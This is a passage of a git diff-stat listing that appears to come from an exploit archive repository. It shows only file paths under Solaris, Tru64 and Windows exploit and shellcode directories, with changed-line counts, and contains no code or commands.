+- platforms/solaris/dos/6775.c | 182 +- platforms/solaris/dos/8597.c | 206 +- platforms/solaris/dos/8598.c | 168 +- platforms/solaris/local/1073.c | 6 +- platforms/solaris/local/1074.c | 6 +- platforms/solaris/local/1092.c | 6 +- platforms/solaris/local/114.c | 6 +- platforms/solaris/local/1182.c | 6 +- platforms/solaris/local/1248.pl | 134 +- platforms/solaris/local/1360.c | 306 +- platforms/solaris/local/197.c | 6 +- platforms/solaris/local/2067.c | 94 +- platforms/solaris/local/210.c | 6 +- platforms/solaris/local/2242.sh | 70 +- platforms/solaris/local/247.c | 6 +- platforms/solaris/local/250.c | 6 +- platforms/solaris/local/256.c | 6 +- platforms/solaris/local/328.c | 6 +- platforms/solaris/local/330.sh | 6 +- platforms/solaris/local/332.sh | 6 +- platforms/solaris/local/338.c | 6 +- platforms/solaris/local/4515.c | 122 +- platforms/solaris/local/4516.c | 210 +- platforms/solaris/local/713.c | 6 +- platforms/solaris/local/714.c | 6 +- platforms/solaris/local/715.c | 6 +- platforms/solaris/local/972.c | 6 +- platforms/solaris/remote/101.pl | 6 +- platforms/solaris/remote/1167.pm | 6 +- platforms/solaris/remote/213.c | 6 +- platforms/solaris/remote/239.c | 6 +- platforms/solaris/remote/263.pl | 6 +- platforms/solaris/remote/280.c | 6 +- platforms/solaris/remote/301.c | 6 +- platforms/solaris/remote/57.txt | 52 +- platforms/solaris/remote/6328.c | 610 +- platforms/solaris_sparc/shellcode/13489.c | 108 +- platforms/solaris_sparc/shellcode/13491.c | 322 +- platforms/solaris_sparc/shellcode/13492.c | 64 +- platforms/solaris_sparc/shellcode/13493.c | 158 +- platforms/solaris_sparc/shellcode/13494.txt | 4 +- platforms/solaris_sparc/shellcode/13495.c | 4 +- platforms/solaris_sparc/shellcode/13496.c | 4 +- platforms/solaris_sparc/shellcode/13497.txt | 4 +- platforms/solaris_x86/shellcode/13498.php | 130 +- platforms/solaris_x86/shellcode/13499.c | 120 +- platforms/solaris_x86/shellcode/13500.c | 144 +- platforms/solaris_x86/shellcode/13501.txt | 4 +- platforms/solaris_x86/shellcode/13502.txt | 4 +- platforms/tru64/local/1624.pl | 60 +- platforms/tru64/local/1625.pl | 64 +- platforms/tru64/local/259.c | 6 +- platforms/tru64/local/281.c | 6 +- platforms/unix/local/302.c | 6 +- platforms/unixware/shellcode/13503.txt | 4 +- platforms/win32/shellcode/13504.asm | 470 +- platforms/win32/shellcode/13505.c | 62 +- platforms/win32/shellcode/13508.asm | 62 +- platforms/win32/shellcode/13509.c | 72 +- platforms/win32/shellcode/13510.c | 86 +- platforms/win32/shellcode/13511.c | 50 +- platforms/win32/shellcode/13512.c | 168 +- platforms/win32/shellcode/13513.c | 144 +- platforms/win32/shellcode/13514.asm | 507 +- platforms/win32/shellcode/13515.pl | 202 +- platforms/win32/shellcode/13516.asm | 274 +- platforms/win32/shellcode/13517.asm | 298 +- platforms/win32/shellcode/13518.c | 38 +- platforms/win32/shellcode/13519.c | 68 +- platforms/win32/shellcode/13520.c | 70 +- platforms/win32/shellcode/13521.asm | 218 +- platforms/win32/shellcode/13522.c | 78 +- platforms/win32/shellcode/13523.c | 82 +- platforms/win32/shellcode/13525.c | 4 +- platforms/win32/shellcode/13526.c | 4 +- platforms/win32/shellcode/13527.c | 4 +- platforms/win32/shellcode/13528.c | 4 +- platforms/win32/shellcode/13529.c | 4 +- platforms/win32/shellcode/13530.asm | 4 +- platforms/win32/shellcode/13531.c | 4 +- platforms/win32/shellcode/13532.asm | 4 +- platforms/win64/shellcode/13533.asm | 318 +- platforms/windows/dos/1024.html | 6 +- platforms/windows/dos/1025.html | 6 +- platforms/windows/dos/1065.c | 6 +- platforms/windows/dos/1067.cpp | 6 +- platforms/windows/dos/1090.cpp | 6 +- platforms/windows/dos/1093.c | 6 +- platforms/windows/dos/1094.pl | 6 +- platforms/windows/dos/1100.pl | 6 +- platforms/windows/dos/1101.c | 6 +- platforms/windows/dos/1104.cpp | 6 +- platforms/windows/dos/1105.c | 6 +- platforms/windows/dos/1107.pl | 6 +- platforms/windows/dos/1109.pl | 6 +- platforms/windows/dos/111.c | 6 +- platforms/windows/dos/1110.txt | 6 +- platforms/windows/dos/1116.c | 6 +- platforms/windows/dos/1121.pl | 6 +- platforms/windows/dos/1126.c | 6 +- platforms/windows/dos/1127.cpp | 6 +- platforms/windows/dos/1129.c | 6 +- platforms/windows/dos/113.pl | 6 +- platforms/windows/dos/1137.pl | 6 +- platforms/windows/dos/1143.sys | 6 +- platforms/windows/dos/1156.c | 6 +- platforms/windows/dos/1158.pl | 6 +- platforms/windows/dos/1159.pl | 6 +- platforms/windows/dos/1162.pl | 6 +- platforms/windows/dos/1164.pl | 6 +- platforms/windows/dos/1192.cpp | 6 +- platforms/windows/dos/1199.c | 6 +- platforms/windows/dos/1212.pl | 6 +- platforms/windows/dos/1218.c | 256 +- platforms/windows/dos/1220.pl | 82 +- platforms/windows/dos/1222.pl | 76 +- platforms/windows/dos/1235.c | 464 +- platforms/windows/dos/1239.c | 468 +- platforms/windows/dos/1246.pl | 130 +- platforms/windows/dos/1251.pl | 76 +- platforms/windows/dos/1255.html | 52 +- platforms/windows/dos/1266.py | 200 +- platforms/windows/dos/1271.c | 764 +- platforms/windows/dos/1281.c | 578 +- platforms/windows/dos/1283.c | 566 +- platforms/windows/dos/1284.c | 450 +- platforms/windows/dos/1285.c | 1070 +- platforms/windows/dos/1286.c | 392 +- platforms/windows/dos/1287.c | 416 +- platforms/windows/dos/1327.pl | 74 +- platforms/windows/dos/1328.c | 660 +- platforms/windows/dos/1341.c | 416 +- platforms/windows/dos/1343.c | 150 +- platforms/windows/dos/1353.py | 88 +- platforms/windows/dos/1368.cpp | 252 +- platforms/windows/dos/1371.c | 176 +- platforms/windows/dos/1372.html | 44 +- platforms/windows/dos/1376.c | 276 +- platforms/windows/dos/1377.pl | 96 +- platforms/windows/dos/1396.cpp | 244 +- platforms/windows/dos/1409.pl | 98 +- platforms/windows/dos/1416.c | 182 +- platforms/windows/dos/1422.c | 184 +- platforms/windows/dos/1423.html | 26 +- platforms/windows/dos/147.c | 6 +- platforms/windows/dos/1475.html | 46 +- platforms/windows/dos/148.sh | 6 +- platforms/windows/dos/153.c | 6 +- platforms/windows/dos/1552.pl | 54 +- platforms/windows/dos/1557.c | 436 +- platforms/windows/dos/1558.c | 918 +- platforms/windows/dos/1559.c | 810 +- platforms/windows/dos/1560.c | 512 +- platforms/windows/dos/1564.c | 1192 +- platforms/windows/dos/1593.c | 204 +- platforms/windows/dos/1601.c | 364 +- platforms/windows/dos/161.c | 6 +- platforms/windows/dos/1613.c | 1074 +- platforms/windows/dos/1614.c | 898 +- platforms/windows/dos/1642.c | 468 +- platforms/windows/dos/1643.c | 366 +- platforms/windows/dos/1688.c | 208 +- platforms/windows/dos/1721.pl | 100 +- platforms/windows/dos/1749.pl | 102 +- platforms/windows/dos/1757.c | 228 +- platforms/windows/dos/1758.pl | 72 +- platforms/windows/dos/176.c | 6 +- platforms/windows/dos/1775.html | 84 +- platforms/windows/dos/1856.url | 48 +- platforms/windows/dos/1949.pl | 62 +- platforms/windows/dos/1967.c | 264 +- platforms/windows/dos/1976.cpp | 166 +- platforms/windows/dos/1977.cpp | 186 +- platforms/windows/dos/1980.pl | 98 +- platforms/windows/dos/1984.py | 264 +- platforms/windows/dos/1989.html | 76 +- platforms/windows/dos/1990.html | 98 +- platforms/windows/dos/2001.c | 5380 +++---- platforms/windows/dos/2037.c | 646 +- platforms/windows/dos/2039.pl | 76 +- platforms/windows/dos/214.c | 6 +- platforms/windows/dos/2160.c | 338 +- platforms/windows/dos/2194.pl | 408 +- platforms/windows/dos/2195.html | 130 +- platforms/windows/dos/2204.c | 434 +- platforms/windows/dos/2208.html | 64 +- platforms/windows/dos/2210.c | 404 +- platforms/windows/dos/2238.html | 176 +- platforms/windows/dos/2302.pl | 142 +- platforms/windows/dos/233.pl | 6 +- platforms/windows/dos/2400.html | 62 +- platforms/windows/dos/2523.pl | 928 +- platforms/windows/dos/2629.html | 62 +- platforms/windows/dos/2650.c | 456 +- platforms/windows/dos/2672.py | 86 +- platforms/windows/dos/2682.pl | 148 +- platforms/windows/dos/2734.py | 172 +- platforms/windows/dos/276.delphi | 6 +- platforms/windows/dos/2783.html | 92 +- platforms/windows/dos/2787.c | 270 +- platforms/windows/dos/2860.c | 198 +- platforms/windows/dos/2861.c | 224 +- platforms/windows/dos/2879.py | 352 +- platforms/windows/dos/2926.py | 66 +- platforms/windows/dos/2934.php | 210 +- platforms/windows/dos/2935.sh | 24 +- platforms/windows/dos/2946.html | 52 +- platforms/windows/dos/2966.html | 50 +- platforms/windows/dos/2967.cs | 46 +- platforms/windows/dos/299.c | 6 +- platforms/windows/dos/3013.py | 254 +- platforms/windows/dos/3034.py | 40 +- platforms/windows/dos/3038.php | 82 +- platforms/windows/dos/3052.c | 520 +- platforms/windows/dos/3056.pl | 86 +- platforms/windows/dos/3078.pl | 164 +- platforms/windows/dos/3111.pl | 28 +- platforms/windows/dos/3112.py | 64 +- platforms/windows/dos/3119.py | 102 +- platforms/windows/dos/3126.c | 196 +- platforms/windows/dos/3128.c | 160 +- platforms/windows/dos/3138.pl | 48 +- platforms/windows/dos/3157.html | 50 +- platforms/windows/dos/3190.py | 28 +- platforms/windows/dos/3229.py | 90 +- platforms/windows/dos/324.txt | 6 +- platforms/windows/dos/3248.rb | 128 +- platforms/windows/dos/3254.py | 80 +- platforms/windows/dos/329.txt | 6 +- platforms/windows/dos/3304.py | 58 +- platforms/windows/dos/3308.pl | 148 +- platforms/windows/dos/3341.cpp | 362 +- platforms/windows/dos/3343.cpp | 238 +- platforms/windows/dos/3347.cpp | 182 +- platforms/windows/dos/3350.html | 98 +- platforms/windows/dos/3392.html | 180 +- platforms/windows/dos/3418.pl | 168 +- platforms/windows/dos/3433.html | 62 +- platforms/windows/dos/345.c | 6 +- platforms/windows/dos/3453.py | 404 +- platforms/windows/dos/3461.pl | 98 +- platforms/windows/dos/35.c | 6 +- platforms/windows/dos/3514.pl | 100 +- platforms/windows/dos/3527.pl | 182 +- platforms/windows/dos/354.html | 6 +- platforms/windows/dos/357.c | 6 +- platforms/windows/dos/3602.py | 120 +- platforms/windows/dos/362.sh | 6 +- platforms/windows/dos/365.html | 6 +- platforms/windows/dos/3684.c | 108 +- platforms/windows/dos/3770.pl | 292 +- platforms/windows/dos/3782.pl | 122 +- platforms/windows/dos/3788.html | 116 +- platforms/windows/dos/3789.html | 114 +- platforms/windows/dos/3790.html | 132 +- platforms/windows/dos/3819.py | 250 +- platforms/windows/dos/3826.html | 126 +- platforms/windows/dos/3830.html | 122 +- platforms/windows/dos/3836.html | 150 +- platforms/windows/dos/3845.html | 120 +- platforms/windows/dos/385.c | 6 +- platforms/windows/dos/3873.html | 34 +- platforms/windows/dos/3883.html | 134 +- platforms/windows/dos/3890.html | 106 +- platforms/windows/dos/3898.html | 198 +- platforms/windows/dos/3910.html | 70 +- platforms/windows/dos/3917.html | 82 +- platforms/windows/dos/3930.txt | 56 +- platforms/windows/dos/3937.html | 64 +- platforms/windows/dos/3939.py | 224 +- platforms/windows/dos/3940.py | 260 +- platforms/windows/dos/39565.txt | 90 + platforms/windows/dos/3969.html | 76 +- platforms/windows/dos/3976.pl | 344 +- platforms/windows/dos/3977.pl | 282 +- platforms/windows/dos/3978.pl | 204 +- platforms/windows/dos/3979.html | 72 +- platforms/windows/dos/3986.html | 68 +- platforms/windows/dos/4009.html | 70 +- platforms/windows/dos/4012.html | 60 +- platforms/windows/dos/4017.cpp | 198 +- platforms/windows/dos/4033.rb | 118 +- platforms/windows/dos/4046.pl | 78 +- platforms/windows/dos/4047.c | 258 +- platforms/windows/dos/4056.html | 44 +- platforms/windows/dos/4058.py | 242 +- platforms/windows/dos/4067.html | 26 +- platforms/windows/dos/4118.html | 28 +- platforms/windows/dos/4126.c | 156 +- platforms/windows/dos/4137.html | 86 +- platforms/windows/dos/4148.html | 156 +- platforms/windows/dos/4149.html | 152 +- platforms/windows/dos/4168.vbs | 256 +- platforms/windows/dos/419.pl | 6 +- platforms/windows/dos/4205.pl | 94 +- platforms/windows/dos/4215.pl | 98 +- platforms/windows/dos/422.c | 6 +- platforms/windows/dos/4227.php | 118 +- platforms/windows/dos/423.pl | 6 +- platforms/windows/dos/4251.html | 62 +- platforms/windows/dos/427.c | 6 +- platforms/windows/dos/4272.c | 856 +- platforms/windows/dos/428.c | 6 +- platforms/windows/dos/4281.c | 362 +- platforms/windows/dos/4285.c | 384 +- platforms/windows/dos/4288.c | 210 +- platforms/windows/dos/429.c | 6 +- platforms/windows/dos/4293.php | 48 +- platforms/windows/dos/4294.pl | 58 +- platforms/windows/dos/4304.php | 88 +- platforms/windows/dos/4318.php | 64 +- platforms/windows/dos/4344.php | 78 +- platforms/windows/dos/4373.html | 122 +- platforms/windows/dos/4379.html | 160 +- platforms/windows/dos/4403.py | 128 +- platforms/windows/dos/4409.html | 296 +- platforms/windows/dos/4474.html | 86 +- platforms/windows/dos/4479.html | 46 +- platforms/windows/dos/4498.pl | 132 +- platforms/windows/dos/4569.pl | 220 +- platforms/windows/dos/4610.html | 230 +- platforms/windows/dos/4613.html | 36 +- platforms/windows/dos/463.c | 6 +- platforms/windows/dos/4682.c | 4 +- platforms/windows/dos/4683.py | 88 +- platforms/windows/dos/4688.html | 136 +- platforms/windows/dos/4716.html | 132 +- platforms/windows/dos/4717.py | 50 +- platforms/windows/dos/474.sh | 6 +- platforms/windows/dos/4742.py | 210 +- platforms/windows/dos/4748.php | 62 +- platforms/windows/dos/4757.txt | 370 +- platforms/windows/dos/4801.html | 144 +- platforms/windows/dos/4829.html | 76 +- platforms/windows/dos/4885.txt | 180 +- platforms/windows/dos/4911.c | 152 +- platforms/windows/dos/4931.txt | 380 +- platforms/windows/dos/5036.pl | 78 +- platforms/windows/dos/5043.html | 94 +- platforms/windows/dos/5044.pl | 78 +- platforms/windows/dos/5063.pl | 60 +- platforms/windows/dos/5086.html | 92 +- platforms/windows/dos/5110.txt | 138 +- platforms/windows/dos/5122.pl | 46 +- platforms/windows/dos/5142.c | 146 +- platforms/windows/dos/5184.py | 56 +- platforms/windows/dos/5201.txt | 44 +- platforms/windows/dos/5217.html | 30 +- platforms/windows/dos/5225.html | 136 +- platforms/windows/dos/5261.py | 40 +- platforms/windows/dos/5270.pl | 78 +- platforms/windows/dos/5321.txt | 34 +- platforms/windows/dos/5341.pl | 80 +- platforms/windows/dos/5349.py | 62 +- platforms/windows/dos/5396.txt | 236 +- platforms/windows/dos/5438.py | 80 +- platforms/windows/dos/5453.pl | 40 +- platforms/windows/dos/5455.py | 46 +- platforms/windows/dos/5460.html | 34 +- platforms/windows/dos/5472.py | 102 +- platforms/windows/dos/5515.txt | 64 +- platforms/windows/dos/562.c | 6 +- platforms/windows/dos/5682.html | 34 +- platforms/windows/dos/5709.pl | 74 +- platforms/windows/dos/571.c | 6 +- platforms/windows/dos/5718.pl | 56 +- platforms/windows/dos/5727.pl | 92 +- platforms/windows/dos/578.pl | 6 +- platforms/windows/dos/5817.pl | 76 +- platforms/windows/dos/5843.html | 38 +- platforms/windows/dos/585.pl | 6 +- platforms/windows/dos/5851.txt | 168 +- platforms/windows/dos/5918.pl | 82 +- platforms/windows/dos/594.pl | 6 +- platforms/windows/dos/5968.py | 50 +- platforms/windows/dos/603.c | 6 +- platforms/windows/dos/604.c | 6 +- platforms/windows/dos/605.c | 6 +- platforms/windows/dos/6059.pl | 110 +- platforms/windows/dos/606.c | 6 +- platforms/windows/dos/607.c | 6 +- platforms/windows/dos/6072.html | 34 +- platforms/windows/dos/6077.c | 146 +- platforms/windows/dos/6083.html | 114 +- platforms/windows/dos/6090.html | 30 +- platforms/windows/dos/61.c | 6 +- platforms/windows/dos/611.c | 6 +- platforms/windows/dos/6181.php | 218 +- platforms/windows/dos/6201.html | 48 +- platforms/windows/dos/6216.html | 64 +- platforms/windows/dos/6244.js | 24 +- platforms/windows/dos/625.pl | 6 +- platforms/windows/dos/6251.txt | 502 +- platforms/windows/dos/6253.txt | 62 +- platforms/windows/dos/6257.pl | 82 +- platforms/windows/dos/626.c | 6 +- platforms/windows/dos/6262.txt | 320 +- platforms/windows/dos/6319.html | 54 +- platforms/windows/dos/6326.html | 70 +- platforms/windows/dos/6327.html | 60 +- platforms/windows/dos/634.pl | 6 +- platforms/windows/dos/6345.html | 118 +- platforms/windows/dos/6365.php | 42 +- platforms/windows/dos/6372.html | 78 +- platforms/windows/dos/6386.html | 72 +- platforms/windows/dos/6391.htm | 136 +- platforms/windows/dos/6424.html | 38 +- platforms/windows/dos/6434.html | 160 +- platforms/windows/dos/6458.c | 154 +- platforms/windows/dos/6463.rb | 318 +- platforms/windows/dos/6474.rb | 130 +- platforms/windows/dos/649.c | 6 +- platforms/windows/dos/6496.c | 188 +- platforms/windows/dos/6497.c | 278 +- platforms/windows/dos/6498.c | 202 +- platforms/windows/dos/651.c | 6 +- platforms/windows/dos/6515.c | 480 +- platforms/windows/dos/653.c | 6 +- platforms/windows/dos/655.c | 6 +- platforms/windows/dos/6554.html | 80 +- platforms/windows/dos/6581.pl | 44 +- platforms/windows/dos/6588.txt | 3140 ++-- platforms/windows/dos/6609.html | 178 +- platforms/windows/dos/6614.html | 236 +- platforms/windows/dos/6615.html | 182 +- platforms/windows/dos/662.pl | 6 +- platforms/windows/dos/664.c | 6 +- platforms/windows/dos/6647.c | 504 +- platforms/windows/dos/665.c | 6 +- platforms/windows/dos/6651.pl | 86 +- platforms/windows/dos/6660.txt | 32 +- platforms/windows/dos/6668.txt | 52 +- platforms/windows/dos/667.c | 6 +- platforms/windows/dos/6671.c | 154 +- platforms/windows/dos/6672.txt | 196 +- platforms/windows/dos/6673.txt | 78 +- platforms/windows/dos/6717.py | 118 +- platforms/windows/dos/6719.py | 152 +- platforms/windows/dos/672.c | 6 +- platforms/windows/dos/6741.py | 80 +- platforms/windows/dos/6742.py | 112 +- platforms/windows/dos/6752.pl | 80 +- platforms/windows/dos/6753.py | 92 +- platforms/windows/dos/6756.txt | 584 +- platforms/windows/dos/6761.html | 40 +- platforms/windows/dos/6800.pl | 40 +- platforms/windows/dos/6812.pl | 40 +- platforms/windows/dos/6815.pl | 40 +- platforms/windows/dos/6832.html | 114 +- platforms/windows/dos/6834.c | 176 +- platforms/windows/dos/6838.rb | 92 +- platforms/windows/dos/6863.pl | 32 +- platforms/windows/dos/6926.pl | 88 +- platforms/windows/dos/700.html | 6 +- platforms/windows/dos/7090.txt | 130 +- platforms/windows/dos/7099.pl | 126 +- platforms/windows/dos/7109.txt | 76 +- platforms/windows/dos/7126.html | 78 +- platforms/windows/dos/7207.pl | 84 +- platforms/windows/dos/7209.pl | 110 +- platforms/windows/dos/7213.pl | 102 +- platforms/windows/dos/7219.pl | 134 +- platforms/windows/dos/7226.html | 88 +- platforms/windows/dos/7249.php | 74 +- platforms/windows/dos/7262.pl | 114 +- platforms/windows/dos/7296.txt | 186 +- platforms/windows/dos/7297.py | 76 +- platforms/windows/dos/7307.txt | 90 +- platforms/windows/dos/7314.txt | 232 +- platforms/windows/dos/7358.html | 78 +- platforms/windows/dos/7362.py | 108 +- platforms/windows/dos/7387.py | 88 +- platforms/windows/dos/7401.txt | 458 +- platforms/windows/dos/742.c | 6 +- platforms/windows/dos/7460.html | 196 +- platforms/windows/dos/7554.pl | 54 +- platforms/windows/dos/7556.php | 210 +- platforms/windows/dos/7578.pl | 60 +- platforms/windows/dos/7592.pl | 42 +- platforms/windows/dos/7637.pl | 98 +- platforms/windows/dos/7693.pl | 90 +- platforms/windows/dos/7694.py | 114 +- platforms/windows/dos/7708.pl | 64 +- platforms/windows/dos/7710.html | 6 +- platforms/windows/dos/7720.pl | 52 +- platforms/windows/dos/7721.pl | 68 +- platforms/windows/dos/7737.py | 48 +- platforms/windows/dos/7750.html | 84 +- platforms/windows/dos/7756.py | 128 +- platforms/windows/dos/7790.txt | 404 +- platforms/windows/dos/7799.pl | 92 +- platforms/windows/dos/7852.pl | 128 +- platforms/windows/dos/7854.pl | 32 +- platforms/windows/dos/7857.pl | 78 +- platforms/windows/dos/7869.html | 92 +- platforms/windows/dos/7902.txt | 550 +- platforms/windows/dos/7904.pl | 40 +- platforms/windows/dos/7934.py | 66 +- platforms/windows/dos/7942.pl | 88 +- platforms/windows/dos/797.py | 6 +- platforms/windows/dos/7985.pl | 114 +- platforms/windows/dos/7986.pl | 92 +- platforms/windows/dos/7990.py | 68 +- platforms/windows/dos/7995.pl | 140 +- platforms/windows/dos/8024.py | 110 +- platforms/windows/dos/8058.pl | 56 +- platforms/windows/dos/8084.pl | 40 +- platforms/windows/dos/810.c | 6 +- platforms/windows/dos/8102.txt | 28 +- platforms/windows/dos/8129.pl | 110 +- platforms/windows/dos/813.c | 6 +- platforms/windows/dos/8135.pl | 176 +- platforms/windows/dos/8156.txt | 68 +- platforms/windows/dos/8190.txt | 152 +- platforms/windows/dos/82.c | 6 +- platforms/windows/dos/8212.pl | 96 +- platforms/windows/dos/8213.pl | 72 +- platforms/windows/dos/8224.pl | 88 +- platforms/windows/dos/8225.py | 32 +- platforms/windows/dos/8294.c | 212 +- platforms/windows/dos/8300.py | 56 +- platforms/windows/dos/8314.php | 106 +- platforms/windows/dos/8325.py | 127 +- platforms/windows/dos/8335.c | 658 +- platforms/windows/dos/8352.txt | 328 +- platforms/windows/dos/8358.pl | 266 +- platforms/windows/dos/8360.pl | 182 +- platforms/windows/dos/8370.pl | 40 +- platforms/windows/dos/8378.pl | 54 +- platforms/windows/dos/8390.cpp | 278 +- platforms/windows/dos/8391.txt | 182 +- platforms/windows/dos/8402.pl | 74 +- platforms/windows/dos/8404.pl | 74 +- platforms/windows/dos/8405.pl | 74 +- platforms/windows/dos/8407.pl | 74 +- platforms/windows/dos/8434.html | 50 +- platforms/windows/dos/8445.pl | 46 +- platforms/windows/dos/8451.pl | 104 +- platforms/windows/dos/8452.c | 2086 +-- platforms/windows/dos/8462.pl | 234 +- platforms/windows/dos/8466.pl | 92 +- platforms/windows/dos/8479.html | 1338 +- platforms/windows/dos/8484.pl | 24 +- platforms/windows/dos/8485.pl | 24 +- platforms/windows/dos/849.c | 6 +- platforms/windows/dos/8511.pl | 84 +- platforms/windows/dos/852.py | 6 +- platforms/windows/dos/8523.txt | 140 +- platforms/windows/dos/8524.txt | 94 +- platforms/windows/dos/8526.py | 50 +- platforms/windows/dos/8542.php | 106 +- platforms/windows/dos/8568.pl | 24 +- platforms/windows/dos/8573.html | 42 +- platforms/windows/dos/8578.pl | 24 +- platforms/windows/dos/8601.txt | 28 +- platforms/windows/dos/8606.py | 68 +- platforms/windows/dos/8607.pl | 28 +- platforms/windows/dos/861.c | 6 +- platforms/windows/dos/8611.pl | 70 +- platforms/windows/dos/8617.pl | 60 +- platforms/windows/dos/8625.pl | 24 +- platforms/windows/dos/8650.c | 216 +- platforms/windows/dos/8665.html | 172 +- platforms/windows/dos/8677.txt | 50 +- platforms/windows/dos/8712.txt | 136 +- platforms/windows/dos/8722.py | 40 +- platforms/windows/dos/8798.rb | 176 +- platforms/windows/dos/882.cpp | 6 +- platforms/windows/dos/8832.php | 100 +- platforms/windows/dos/886.pl | 6 +- platforms/windows/dos/887.py | 6 +- platforms/windows/dos/8899.txt | 158 +- platforms/windows/dos/891.pl | 6 +- platforms/windows/dos/893.pl | 6 +- platforms/windows/dos/8971.pl | 132 +- platforms/windows/dos/899.pl | 6 +- platforms/windows/dos/9006.py | 306 +- platforms/windows/dos/9029.rb | 84 +- platforms/windows/dos/9033.pl | 52 +- platforms/windows/dos/9061.pl | 26 +- platforms/windows/dos/908.c | 6 +- platforms/windows/dos/9090.pl | 24 +- platforms/windows/dos/9100.html | 92 +- platforms/windows/dos/9102.pl | 68 +- platforms/windows/dos/9113.txt | 184 +- platforms/windows/dos/9114.txt | 284 +- platforms/windows/dos/9116.html | 82 +- platforms/windows/dos/9123.pl | 30 +- platforms/windows/dos/9124.pl | 32 +- platforms/windows/dos/9131.py | 148 +- platforms/windows/dos/9133.pl | 60 +- platforms/windows/dos/9141.pl | 26 +- platforms/windows/dos/9147.pl | 22 +- platforms/windows/dos/9157.pl | 18 +- platforms/windows/dos/916.pl | 6 +- platforms/windows/dos/9163.txt | 88 +- platforms/windows/dos/9168.pl | 76 +- platforms/windows/dos/9173.pl | 26 +- platforms/windows/dos/9178.pl | 80 +- platforms/windows/dos/9189.pl | 20 +- platforms/windows/dos/9192.pl | 20 +- platforms/windows/dos/9200.pl | 24 +- platforms/windows/dos/9212.pl | 80 +- platforms/windows/dos/9220.pl | 54 +- platforms/windows/dos/9222.cpp | 372 +- platforms/windows/dos/9240.py | 60 +- platforms/windows/dos/9242.py | 54 +- platforms/windows/dos/9277.pl | 50 +- platforms/windows/dos/9295.txt | 864 +- platforms/windows/dos/9304.txt | 94 +- platforms/windows/dos/9317.c | 588 +- platforms/windows/dos/9345.pl | 46 +- platforms/windows/dos/9359.pl | 50 +- platforms/windows/dos/9361.pl | 24 +- platforms/windows/dos/9362.html | 36 +- platforms/windows/dos/9376.py | 50 +- platforms/windows/dos/941.c | 6 +- platforms/windows/dos/9411.cpp | 654 +- platforms/windows/dos/9423.pl | 70 +- platforms/windows/dos/9446.cpp | 316 +- platforms/windows/dos/9449.txt | 178 +- platforms/windows/dos/9455.html | 48 +- platforms/windows/dos/9496.txt | 124 +- platforms/windows/dos/9515.txt | 186 +- platforms/windows/dos/9516.txt | 130 +- platforms/windows/dos/9517.txt | 116 +- platforms/windows/dos/9528.py | 58 +- platforms/windows/dos/9537.htm | 124 +- platforms/windows/dos/9539.py | 60 +- platforms/windows/dos/9546.pl | 42 +- platforms/windows/dos/9549.c | 908 +- platforms/windows/dos/9554.html | 48 +- platforms/windows/dos/9561.py | 82 +- platforms/windows/dos/9573.pl | 110 +- platforms/windows/dos/9584.txt | 56 +- platforms/windows/dos/9585.txt | 62 +- platforms/windows/dos/9597.txt | 82 +- platforms/windows/dos/9606.pl | 68 +- platforms/windows/dos/9607.pl | 66 +- platforms/windows/dos/9620.pl | 64 +- platforms/windows/dos/9626.py | 56 +- platforms/windows/dos/9657.pl | 48 +- platforms/windows/dos/9667.c | 212 +- platforms/windows/dos/9668.txt | 140 +- platforms/windows/dos/9670.txt | 126 +- platforms/windows/dos/9671.py | 24 +- platforms/windows/dos/9672.py | 106 +- platforms/windows/dos/9677.c | 453 +- platforms/windows/dos/9682.txt | 104 +- platforms/windows/dos/9683.txt | 150 +- platforms/windows/dos/9684.txt | 166 +- platforms/windows/dos/9685.txt | 162 +- platforms/windows/dos/9686.py | 46 +- platforms/windows/dos/9689.pl | 32 +- platforms/windows/dos/9691.pl | 80 +- platforms/windows/dos/9701.c | 1116 +- platforms/windows/dos/9707.pl | 34 +- platforms/windows/dos/978.cpp | 6 +- platforms/windows/dos/983.cpp | 6 +- platforms/windows/dos/988.cpp | 6 +- platforms/windows/local/1019.c | 6 +- platforms/windows/local/1032.cpp | 6 +- platforms/windows/local/1034.cpp | 6 +- platforms/windows/local/1085.c | 6 +- platforms/windows/local/1086.c | 6 +- platforms/windows/local/1091.c | 6 +- platforms/windows/local/1128.c | 6 +- platforms/windows/local/1161.c | 6 +- platforms/windows/local/1168.c | 6 +- platforms/windows/local/1173.c | 6 +- platforms/windows/local/1174.c | 6 +- platforms/windows/local/1197.c | 6 +- platforms/windows/local/1198.c | 6 +- platforms/windows/local/122.c | 6 +- platforms/windows/local/1406.php | 98 +- platforms/windows/local/1407.c | 900 +- platforms/windows/local/1455.txt | 174 +- platforms/windows/local/1465.c | 988 +- platforms/windows/local/1470.c | 216 +- platforms/windows/local/1490.c | 142 +- platforms/windows/local/1495.cpp | 128 +- platforms/windows/local/1555.c | 278 +- platforms/windows/local/172.c | 6 +- platforms/windows/local/1772.c | 344 +- platforms/windows/local/1910.c | 212 +- platforms/windows/local/1917.pl | 140 +- platforms/windows/local/1944.c | 670 +- platforms/windows/local/1958.pl | 580 +- platforms/windows/local/1978.pl | 192 +- platforms/windows/local/1986.cpp | 940 +- platforms/windows/local/1988.pl | 576 +- platforms/windows/local/1992.py | 180 +- platforms/windows/local/1999.pl | 254 +- platforms/windows/local/2065.c | 458 +- platforms/windows/local/2091.cpp | 4520 +++--- platforms/windows/local/2094.c | 548 +- platforms/windows/local/2264.htm | 172 +- platforms/windows/local/2284.c | 324 +- platforms/windows/local/2286.cpp | 252 +- platforms/windows/local/2676.cpp | 816 +- platforms/windows/local/272.c | 6 +- platforms/windows/local/2950.c | 490 +- platforms/windows/local/3024.c | 548 +- platforms/windows/local/3071.c | 660 +- platforms/windows/local/3131.c | 336 +- platforms/windows/local/3149.cpp | 352 +- platforms/windows/local/3159.cpp | 346 +- platforms/windows/local/3176.cpp | 472 +- platforms/windows/local/32.c | 6 +- platforms/windows/local/3342.c | 300 +- platforms/windows/local/3349.c | 220 +- platforms/windows/local/3369.pl | 192 +- platforms/windows/local/3417.php | 88 +- platforms/windows/local/3429.php | 36 +- platforms/windows/local/3431.php | 88 +- platforms/windows/local/3439.php | 92 +- platforms/windows/local/3451.c | 448 +- platforms/windows/local/3488.php | 88 +- platforms/windows/local/350.c | 6 +- platforms/windows/local/351.c | 6 +- platforms/windows/local/353.c | 6 +- platforms/windows/local/355.c | 6 +- platforms/windows/local/3576.php | 92 +- platforms/windows/local/3593.c | 454 +- platforms/windows/local/3617.cpp | 290 +- platforms/windows/local/3647.c | 142 +- platforms/windows/local/3649.c | 128 +- platforms/windows/local/3652.c | 338 +- platforms/windows/local/368.c | 6 +- platforms/windows/local/3695.c | 174 +- platforms/windows/local/3727.c | 174 +- platforms/windows/local/3757.txt | 286 +- platforms/windows/local/3777.c | 224 